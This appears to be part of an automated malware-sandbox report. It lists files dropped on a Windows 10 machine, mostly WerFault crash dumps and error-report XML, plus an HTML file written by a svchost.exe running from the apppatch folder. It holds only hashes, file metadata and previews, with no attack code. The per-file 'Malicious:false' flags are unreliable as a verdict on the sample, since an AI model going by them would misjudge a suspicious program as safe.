                                                                                                                                                                                                            SHA-512:F8A6D34E77A0C1A3D40E9AF14A42E6A0E0268DADEE9B7EF95DE40983AAD6119E598859BDAF74FF8021DD6CB57CB50F84962B53661CB3049ED632346F4C287D53
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:12 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):669838
                                                                                                                                                                                                            Entropy (8bit):1.520122477351673
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:M/kUmCi2z7XIwvStGNRaxSFWHYqNXttjPp4kkjJE7mLJ:Ek1uvStGN08FW/dtbpHkFCmL
                                                                                                                                                                                                            MD5:8759406F4752392E2E93E7ABA46A70E4
                                                                                                                                                                                                            SHA1:68604F26A30FCF8852DF6F18E56CD2E09EF6F6CD
                                                                                                                                                                                                            SHA-256:DBF5D971927F1533D8623C8DDD12BEE88597B4FD15611B52EBB38B7F42F3F908
                                                                                                                                                                                                            SHA-512:CA5341D9C8AB5CE372840019720D5349017BB1C2F456844C308AF4AC9F2E484266B0F074FAABED809ECCE5CCD9FB3C5207AE7BB0F6F8F0EF3E3004412D231F38
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.713227808977653
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJeoWe764q6YcD5SUfU7gmfCeryprJ89bqpsf7Om:R6lXJZ/7636YuSUfU7gmfCerxqCfr
                                                                                                                                                                                                            MD5:ADA19176B541FDF207106DEA572B61CC
                                                                                                                                                                                                            SHA1:59FF7B590F4B208FE8400CBBC1BCB47D04617ACA
                                                                                                                                                                                                            SHA-256:550448F8765D13FFAB273A3976E04C834AE29A4253DCF4BCFF385C1E16F108DE
                                                                                                                                                                                                            SHA-512:A3A66736FEA183321468DC62CC1468A86379CD1F2D862A2FF6A2C2CF1C8E3805A27A28E7DF0331AAEB710F8757A8A2CEE67F27317E4419BD385DC37B420DFC3C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.568902635204057
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsXJg77aI944c/WpW8VYDYm8M4JuXLBFUTj+q8K/7X41Dxd:uIjf5I7y4cu7VrJgUZXqDxd
                                                                                                                                                                                                            MD5:9065E9F9A0D4B9C17AB2736CD9615C72
                                                                                                                                                                                                            SHA1:AAAF4AF7E5675CFD3B4E1485BF2244732747A2EF
                                                                                                                                                                                                            SHA-256:86235B0E4682501C612F7343979BCB33BEDD295338E6734C81AAD269AEF508E8
                                                                                                                                                                                                            SHA-512:224BD419F657BDC382398271AD23E051C2EA5037931951C217A55FA2D93BBFA8A4A96C13FC58C37037098AA17063F2170E9C343ECD207FDC235E479D52688167
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.711264657419031
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJxWH6ire6YcD4SU9USgmfCeryprD89bqKsfovOm:R6lXJxu6P6Y/SU9USgmfCerDqpfw
                                                                                                                                                                                                            MD5:E57F57DE80B3BCA40631C38B5536E64E
                                                                                                                                                                                                            SHA1:F79DCF8816341163A54248F400D0C53E53E7907B
                                                                                                                                                                                                            SHA-256:F6549A12408DBE994990EA5CAF5D5AF41171BEE8CD1ED05409929EFEA5278E7F
                                                                                                                                                                                                            SHA-512:04EDEF52691DFC43F8B850D02B9F2E7B0255A8ABE7A69F26905C0E3913E29008E9B8D479DC88978521C5907E58256DE557398A6E3BC3590566D64096EC52BEAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.8.4.<./.P.i.
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:14 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):96724
                                                                                                                                                                                                            Entropy (8bit):1.7246562533817698
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rTSAbuDcziAHzGi+tNNnmRrPHkaxwTYUyIPb:tbrziAHzGJzmRrIYUhP
                                                                                                                                                                                                            MD5:A497B6763AC515FAE307E0974CEE55BA
                                                                                                                                                                                                            SHA1:36A548C9AA5414D303D51F8F5CF542C8B2CE9B26
                                                                                                                                                                                                            SHA-256:7489C6D114BCFB1D4157F75EA86565A94009E6E5D496D686972D907272EFE5D6
                                                                                                                                                                                                            SHA-512:A8232F54865E8E41639EADDC336CAAF7EC1CEE277148CF951B5CD6C491609BEE0548253F7ADB607D342492E6B7682B1500881D2A06E9AFDF3FCE1CC421C0E8F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.57038653632582
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsXJg77aI944c/WpW8VYZYm8M4JuXLBFyf+q8K/7lceL41D2d:uIjf5I7y4cu7VNJgOfZlqD2d
                                                                                                                                                                                                            MD5:EE1CE1571E5A426ED42BF66E29331A63
                                                                                                                                                                                                            SHA1:1FCAA3F6230CEE618BC79055F9DA3DC7B04CCA84
                                                                                                                                                                                                            SHA-256:24175B2AAEA9F02029D5C5881C6631E5BC71178CE770082DC1312E5363F7D31D
                                                                                                                                                                                                            SHA-512:8815DEB91E69263CA92CC9A1A73150A032D4E3F67429FA8DA5BB43C873CB032DD82F15B91D417BAB42DC239FAA7011B157AEDC4099DFFE2944FC8C87BBDE1C48
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8430
                                                                                                                                                                                                            Entropy (8bit):3.7111576400051547
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>6304</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.568043673979562
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:17 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):888734
                                                                                                                                                                                                            Entropy (8bit):1.7854932760432178
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8440
                                                                                                                                                                                                            Entropy (8bit):3.7116643732021006
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>4628</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.569390102829339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583690" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:23 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):827744
                                                                                                                                                                                                            Entropy (8bit):1.7002121172562972
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.712161285954589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>1756</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.569290786373477
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583691" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:25 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):964280
                                                                                                                                                                                                            Entropy (8bit):1.754663931391682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:RD7NaJouyJPCuQNH+60sSt+YqmEzPMAC25O:RDIJouyJPCuM74a5O
                                                                                                                                                                                                            MD5:9469B28D917B4B8B3116AF89D1E4DA09
                                                                                                                                                                                                            SHA1:6CE02011CD8CCFBBB3191B80483567F47052BD51
                                                                                                                                                                                                            SHA-256:D66FE795A1EC3CE521FA4BCFB1A5B85EDD2A7B5E5DB7BE3BD64B9031384040F0
                                                                                                                                                                                                            SHA-512:CC3220D8E8416BD4EC691CF7000435654A059155969C94F14D2DC9DFB0A87A6F39570E2F8073AC52CF189DA5D33AED1E6C4012A80EF29D99441DDE48DD8AED5A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8442
                                                                                                                                                                                                            Entropy (8bit):3.7143353584510836
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJTWz6C6YcD6SU1UPgmfCeryprC89bk3sf7sm:R6lXJT66C6YdSU1UPgmfCerMk8fF
                                                                                                                                                                                                            MD5:7239E76FB803A825C406ED83F6AE848B
                                                                                                                                                                                                            SHA1:9F8F552F5266039CBD474EF7B66D1A3DBD279A85
                                                                                                                                                                                                            SHA-256:A9B5169E0D823ABC25279431FE864063228658CBCCFBF450817776C7610A17A0
                                                                                                                                                                                                            SHA-512:DA58768D8CDE2FE64F70A066012049F5DA84E151D8804A264115D6B0FC7C865EC28D2970F60526F5338E80014B335C8178B5A87ADFA11BE78A166C8F089145EB
                                                                                                                                                                                                            Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>1812</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.567918503737517
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsoJg77aI944c/WpW8VYFYm8M4JuXLBFF+q8K/7q41Dhdd:uIjfuI7y4cu7VhJg5ZqqDhdd
                                                                                                                                                                                                            MD5:48ABC0D33729B72656A572F905630A9D
                                                                                                                                                                                                            SHA1:4B5C8B9C96701D92BC4451BDD6C174FB1ABC7287
                                                                                                                                                                                                            SHA-256:3EDD9EEB81BB7122ED0265340C171473D2C637186819000F331C88A62404C3BC
                                                                                                                                                                                                            SHA-512:455A04D6FACA2C9CA7E61CCE874C1694F3A712B4095CB76CE4F58BAB42E1942EA76861B85FC51451BBDE038AAD478F2B55002A24579D024B17AEAFA03BA71CE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583691" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:08:27 2024, 0x1205a4 type
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):663452
                                                                                                                                                                                                            Entropy (8bit):1.4572931173819914
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:lEyiq1kj+Y5rrh8SngsLfMguBvP+GLlJ0s:KyZKF5rFDgOfMmG
                                                                                                                                                                                                            MD5:D0D1D2EAB4897A9AAF1988A7F8D5F39A
                                                                                                                                                                                                            SHA1:4F6223F9A8B2098A262734184BD00A3D280D45C5
                                                                                                                                                                                                            SHA-256:070EDEF1B5BAB638574770EDE1588B595E197C7DC976C502CDB13B4E30609443
                                                                                                                                                                                                            SHA-512:50B9C33DF98931F8980C8A57205B6C48D4510842246FEE9E067AFCF047433565831385EEA3CF1DB9199DF88F10905683340E01C8B4550B4008BDBF07914FAF54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8438
                                                                                                                                                                                                            Entropy (8bit):3.714585847108227
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJpWF6z96YcD1SUeUngmfCeryprx89bqEsfium:R6lXJpM6p6YCSUeUngmfCerJq3fy
                                                                                                                                                                                                            MD5:431167522E23B3B401F5FABC73DE8E8D
                                                                                                                                                                                                            SHA1:43B947E5FF626087DB3866D427A82D4E6ABD4DA9
                                                                                                                                                                                                            SHA-256:2531716D028E3B7F902B2C92292AD81F1AC943798F54A55B4E11A3E292D55F8B
                                                                                                                                                                                                            SHA-512:FF739C69C547CA7CA12EEA8A4813415E029D1D3DD134B9FD4FAE38680EB5FF23C359B45C11E4006B760B9556DD1A2C4CBF8232F3751B259585D3C2809D30B84E
                                                                                                                                                                                                            Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>19045</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>.. <Revision>2006</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>1900</Pi
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4709
                                                                                                                                                                                                            Entropy (8bit):4.569948971951502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsoJg77aI944c/WpW8VYZYm8M4JuXLBFE+q8K/7e41Dud:uIjfuI7y4cu7VhJgwZeqDud
                                                                                                                                                                                                            MD5:7BB6A4F3EF4BB277B150320939DAF74C
                                                                                                                                                                                                            SHA1:01531EB506AAC7064FF7053DB630B91C8A89D504
                                                                                                                                                                                                            SHA-256:F100BF0CB06799530AEA7F238B85ACC18FDFD47E0456E435083E7620CA9CA947
                                                                                                                                                                                                            SHA-512:EFDC01B25BBE214667DA4D56E6D239D498CD5F0FC5D8A3C155BB72F5C9EEEC52C78F9DB3ADD6E44FFC9DDCF014CC29AE30038FDCFF6C0CA4088D61D9707B4F78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583691" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43438
                                                                                                                                                                                                            Entropy (8bit):6.058290206467593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:CiBtrifZVO7Wg3hIBYFDWY7JXF5SN/QO4SN/QOV/SN/QOQSN/QOHSN/QOIsVBEH6:C8Cg3plFFAN/QOBN/QOVqN/QO5N/QOy1
                                                                                                                                                                                                            MD5:BFB2F05D95B02671C1794B0A84E91585
